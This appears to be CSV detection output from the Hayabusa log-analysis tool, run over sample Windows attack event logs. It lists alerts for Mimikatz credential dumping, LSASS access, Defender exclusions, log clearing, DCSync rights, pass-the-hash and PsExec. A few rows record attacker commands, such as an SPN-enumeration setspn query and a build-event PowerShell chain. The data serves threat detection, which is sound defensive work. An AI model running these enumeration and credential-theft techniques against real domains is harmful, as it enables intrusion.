Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx -2020-12-16 17:44:06.473 +09:00,WIN10-client01.offsec.lan,5007,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx -2020-12-16 17:44:27.222 +09:00,WIN10-client01.offsec.lan,5007,medium,Windows Defender Exclusions Added,,rules/sigma/other/windefend/win_defender_exclusions.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx -2020-12-16 17:44:27.222 +09:00,WIN10-client01.offsec.lan,5007,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx -2020-12-16 17:44:27.222 +09:00,WIN10-client01.offsec.lan,5007,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx -2020-12-16 17:44:51.331 +09:00,WIN10-client01.offsec.lan,5007,medium,Windows Defender Exclusions Added,,rules/sigma/other/windefend/win_defender_exclusions.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx -2020-12-16 17:45:04.144 +09:00,WIN10-client01.offsec.lan,5007,medium,Windows Defender Exclusions Added,,rules/sigma/other/windefend/win_defender_exclusions.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx -2021-01-26 22:21:13.690 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false : Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe"" ""C:\Users\bouss\source\repos\blabla\blabla.sln""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx -2021-01-26 22:21:13.690 +09:00,LAPTOP-JU4M3I0E,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx -2021-01-26 22:21:13.978 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\windows\system32\cmd.exe"" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd : Path: C:\Windows\SysWOW64\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx -2021-01-26 22:21:14.023 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: powershell.exe start-process notepad.exe : Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\windows\system32\cmd.exe"" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx -2021-01-26 22:21:14.023 +09:00,LAPTOP-JU4M3I0E,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx -2021-01-26 22:21:14.296 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\windows\system32\notepad.exe"" : Path: C:\Windows\SysWOW64\notepad.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: powershell.exe start-process notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx -2021-01-26 22:21:14.428 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp"" /c ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp"" : Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx -2021-01-26 22:21:14.456 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp : Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\Hostx86\x86\cl.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp"" /c ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx -2021-01-26 22:21:14.667 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\VCTIP.EXE"" : Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\Hostx86\x86\vctip.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx -2021-02-01 20:13:11.195 +09:00,fs02.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1015,technique_name=Accessibility Features : Command: setspn -T offsec -Q */* : Path: C:\Windows\System32\setspn.exe : User: OFFSEC\admmig : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID1-SPN discovery (SYSMON process).evtx -2021-02-01 20:13:11.195 +09:00,fs02.offsec.lan,1,medium,Possible SPN Enumeration,,rules/sigma/process_creation/win_spn_enum.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID1-SPN discovery (SYSMON process).evtx -2021-02-03 00:37:59.991 +09:00,fs02.offsec.lan,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-Time changed.evtx -2021-02-03 00:37:59.993 +09:00,fs02.offsec.lan,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-Time changed.evtx -2021-02-03 00:38:31.989 +09:00,fs02.offsec.lan,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-Time changed.evtx -2021-02-03 00:38:31.995 +09:00,fs02.offsec.lan,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-Time changed.evtx -2021-02-08 21:03:02.776 +09:00,rootdc1.offsec.lan,4738,high,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-User set with reversible psw encryption.evtx -2021-02-08 21:06:15.608 +09:00,rootdc1.offsec.lan,4738,high,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-Use only Kerberos DES encryption types.evtx -2021-02-08 21:06:53.407 +09:00,rootdc1.offsec.lan,4738,high,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-Do not require Kerberos preauthentication.evtx -2021-02-23 07:18:08.605 +09:00,rootdc1.offsec.lan,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5136-Permission change on top root AD (DCsync).evtx -2021-02-23 07:18:08.605 +09:00,rootdc1.offsec.lan,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5136-Permission change on top root AD (DCsync).evtx -2021-02-23 07:35:11.993 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID5136-4662 AD object owner changed.evtx -2021-02-23 07:35:20.786 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID5136-4662 AD object owner changed.evtx -2021-02-23 08:07:21.231 +09:00,jump01.offsec.lan,59,informational,Bits Job Creation,Job Title: hackingarticles : URL: https://www.ma-neobanque.com/wp-content/uploads/2020/11/carte-max-premium.jpg,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID3-59-60-BITS job created.evtx -2021-03-16 03:49:21.017 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2021-03-16 03:49:23.184 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: ab170ec9.png : URL: https://i.imgur.com/IFpvPlt.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2021-03-16 03:52:31.347 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1eBRSG.img?w=100&h=100&m=6&tilesize=medium&x=1788&y=885&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2021-03-16 03:52:33.804 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2021-03-16 03:53:18.009 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2021-03-16 03:53:51.796 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1eC0p1.img?w=100&h=100&m=6&tilesize=medium&x=1964&y=1240&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2021-03-16 03:53:52.751 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2021-03-16 03:54:15.647 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: efc1a28b.png : URL: https://i.imgur.com/IFpvPlt.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2021-03-16 03:55:38.049 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{259DDBBE-DDD3-4590-8A2C-60211631093C}-GoogleUpdateSetup.exe : URL: http://r5---sn-5hnedn7l.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe?cms_redirect=yes&mh=pH&mip=213.127.64.248&mm=28&mn=sn-5hnedn7l&ms=nvh&mt=1615834104&mv=m&mvi=5&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2021-03-16 04:01:32.985 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{F1502BD5-ADFF-4123-9C07-0E4B02FCB037}-89.0.4389.82_87.0.4280.66_chrome_updater.exe : URL: http://r1---sn-5hne6nlr.gvt1.com/edgedl/release2/chrome/AKGnpidu3x0C0gtuxw-XHRQ_89.0.4389.82/89.0.4389.82_87.0.4280.66_chrome_updater.exe?cms_redirect=yes&mh=rx&mip=213.127.64.248&mm=28&mn=sn-5hne6nlr&ms=nvh&mt=1615834584&mv=m&mvi=1&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx -2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx -2021-03-27 01:12:22.201 +09:00,jump01.offsec.lan,13,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID13-New service for Mimikatz.evtx -2021-03-27 01:12:22.201 +09:00,jump01.offsec.lan,13,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID13-New service for Mimikatz.evtx -2021-03-27 01:17:29.210 +09:00,jump01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx -2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx -2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx -2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx -2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx -2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,high,Credential Dumping Tools Service Execution,,rules/sigma/builtin/security/win_security_mal_creddumper.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx -2021-03-27 01:36:00.106 +09:00,jump01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx -2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4658,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx -2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4658,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx -2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx -2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,critical,LSASS Access from Non System Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx -2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx -2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,high,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx -2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4663,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx -2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4663,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx -2021-03-27 01:59:24.880 +09:00,rootdc1.offsec.lan,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4661-4658 Mimikatz sekurlsa password dump SAM.evtx -2021-03-27 01:59:24.892 +09:00,rootdc1.offsec.lan,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4661-4658 Mimikatz sekurlsa password dump SAM.evtx -2021-04-21 05:32:55.368 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx -2021-04-21 05:32:55.368 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx -2021-04-21 05:33:00.305 +09:00,MSEDGEWIN10,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx -2021-04-21 05:33:00.384 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\user03 : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx -2021-04-21 05:33:01.944 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx -2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx -2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx -2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx -2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx -2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx -2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx -2021-04-21 18:27:51.181 +09:00,jump01.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-7036 PSexec service installation.evtx -2021-04-21 18:40:32.342 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.42.22 : Port: 56661 : LogonID: 0x1375fbd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.343 